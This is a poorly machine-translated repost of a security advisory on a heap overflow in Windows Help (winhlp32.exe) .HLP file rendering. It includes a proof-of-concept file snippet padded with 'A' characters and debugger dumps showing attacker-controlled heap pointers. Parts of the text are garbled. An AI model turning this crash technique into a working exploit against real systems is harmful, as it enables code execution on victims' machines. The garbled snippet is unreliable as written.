Microsoft Windows helps image processing with the Heap Overflow Vulnerability (copied online)

Source: Internet
Author: User

 

Copy From (http://hi.baidu.com/jymx6/blog/item/d609f2c4afb132a98326ac61.html), after nothing can study

 

Microsoft Windows Help graph Processing Heap Overflow Vulnerability

Graph processing heap overflow vulnerability in Microsoft Windows

Affected Systems:

Microsoft Windows XP SP2

Microsoft Windows XP SP1

Microsoft Windows Server 2003 SP1

Microsoft Windows Server 2003

Microsoft Windows NT Server 4.0

Microsoft Windows 2000sp4

Microsoft Windows 2000sp3

Microsoft Windows 2000sp2

Microsoft Windows 2000sp1

Description:

--------------------------------------------------------------------------------

BugTraq ID: 17325

Microsoft Windows is a very popular operating system released by Microsoft.

The. HLP File rendering engine of winhlp32.exe has a heap overflow vulnerability. Attackers can embed HTML pages in the. HLP file to trigger this vulnerability, overwrite the memory block, and execute arbitrary commands.

Test method:

--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

Take acmsetup. HLP as an example:

... Snip .....

: CW ('main'): FH ()

: CBB ('btn _ topics

', 'Ns (): Ji ('> Mai

N', 'helptopicsbu

Tton '): FH (): CS ()

: FH (): FD () '): SPC

(1, 16777215): FH ().

... LP .....

...............

. Z .../..........

................

................

... W.. X...

... 5. '... %... e

% ...... 3. @ = ......

... X ..

// Attackers can inject malicious input to trigger this vulnerability:

... Snip ......

: CW ('main'): FH ()

: CBB ('btn _ topics

', 'Ns (): Ji ('> Mai

N', 'helptopicsbu

Tton '): FH (): CS ()

: FH (): FD () '): SPC

(1, 16777215): FH ().

... LP .....

...............

. Z .../..........

... Aaaaaaa

Aaaaaaaaaaaaaaaa

Aaaaaaaaaaaaaaaa

Aaaaaaaaaaaaaaaa

Plus 10,000 more

After winhlp32.exe opens the. HLP file, the heap status is as follows:

Heap[winhlp32.exe]: heap block at 0009b940 modified at 0009b9a2 past requested size of 5a

0: 000> dd 0009b940

0009b940 0005000f 001e0700 4f26001f 41697470

0009b950 41414141 ababababab 41 ababab feeefeee

0009b960 4100 feee 41414141 00040000 41000005

0009b970 554d001b 41002928 41414141 feababab

0009b980 4100 feee 00000000 41060000 41414141

0009b990 6f42001f 416d6b6f 65446b72 416e6966

0009b9a0 41414141 ababababab 41 ababab feeefeee

0009b9b0 4100 feee 00004141 000f0006 feee0400

Heap[winhlp32.exe]: Invalid Address specified to rtlfreeheap (00090000,000 9b948)

(728.2f8): Break instruction exception-code 80000003 (first chance)

Eax = 0009b940 EBX = 0009b940 ECx = 77f75c17 edX = 0007 ecba ESI = 00090000 EDI = 0009b940

EIP = 77f75a58 ESP = 0007eec4 EBP = 0007eed8 iopl = 0 NV up ei pl nz na PE NC

Cs = 001b Ss = 0023 DS = 0023 es = 0023 FS = 0038 GS = 0000 EFL = 00000202

0: 000> dd 0009b948

0009b948 4f26001f 41697470 41414141 abababab

0009b958 41 ababab feeefeee 4100 feee 41414141

0009b968 00040000 41000005 554d001b 41002928

0009b978 41414141 feababab 4100 feee 00000000

0009b988 41060000 41414141 6f42001f 416d6b6f

0009b998 65446b72 416e6966 41414141 abababab

0009b9a8 41 ababab feeefeee 4100 feee 00004141

0009b9b8 000f0006 00230400 000901a8 000901a8

Heap[winhlp32.exe]: heap block at 0009be50 modified at 0009bf54 past requested size of FC

0: 000> dd 0009be50

0009be50 00180023 001c0700 02390006 007a0000

0009be60 00000000 02b30000 00280000 000e0000

0009be70 000d0000 00010000 00000004 00000000

0009be80 00000000 005a0000 00100000 00000000

0009be90 00000000 00000000 80000080 80000000

0009bea0 00800080 00800000 80800080 41410000

0009beb0 41414141 41414141 41414141 41414141

0009bec0 41414141 41414141 41414141 41414141

It can be seen that the tail of the previous block has been overwritten in 0009be54, and the following parts are controlled:

0: 000> dd 0009bf54

0009bf54 41414141 41414141 41414141 41414141

0009bf64 41414141 41414141 41414141 41414141

0009bf74 41414141 41414141 41414141 41414141

0009bf84 41414141 41414141 41414141 41414141

0009bf94 41414141 41414141 41414141 41414141

0009bfa4 41414141 41414141 41414141 41414141

0009bfb4 41414141 41414141 41414141 41414141

0009bfc4 41414141 41414141 41414141 41414141

Because the two pointers can be directly controlled in the heap management structure, it can cover 4 bytes of arbitrary memory:

Eax 41414141

ECX 41414141

EdX 0009e5d8 ASCII "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ..."

EBX 00090000

ESP 0007f90c

EBP 0007fb30

ESI 0009e5d8 ASCII "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ..."

EDI 1, 00000068

EIP 77f581bd ntdll.77f581bd

Suggestion:

--------------------------------------------------------------------------------

Vendor patch:

Microsoft

---------

Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:

Http://www.microsoft.com/technet/security/

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.